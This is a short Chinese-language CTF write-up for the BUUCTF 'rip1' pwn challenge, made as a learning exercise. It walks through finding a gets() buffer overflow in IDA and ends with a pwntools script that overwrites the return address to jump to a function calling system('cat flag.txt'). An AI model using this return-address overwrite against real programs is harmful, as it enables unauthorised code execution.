【Pwn | CTF】BUUCTF rip1
天命:第二题pwn,这次知道了目标就是瞄准system函数,如果里面是 /bin/sh 之类的就是直接getshell,如果是普通命令的话,应该就是getflag了
IDA64位打开文件
第8行的函数是把一个东西放进S这个字符串数组变量里
sub_40060D这个函数就是重点,点进去一看就是我们的目标system("cat flag.txt")
getflag 的函数
main最后一行就是gets函数,应该就是利用这个有漏洞的函数进行覆盖缓冲区
那就要拿到两个东西:sub_40060D函数的入口地址 和 v5变量的缓冲区大小
条件一:获取sub_40060D函数入口地址
先打开一下地址栏,因为是没有默认打开的
把这两个勾上,才会有地址
用汇编查看代码,就能看到入口地址
条件二:获取v5变量的缓冲区大小
点进去变量,然后这里开始我就不懂了,别人wp就说这里是40空间+8空间(8空间就是覆盖64位下rbp的长度)
最后攻击
一知半懂
from pwn import *
p = remote('node5.buuoj.cn','26425')
# 其实我也没怎么理解
# 这里是字符串a是用二进制,然后乘16进制的0x48
# 加上入口函数的地址
payload = b'a' * (0x40+8) + p64(0x40060D)
p.sendline(payload)
p.interactive()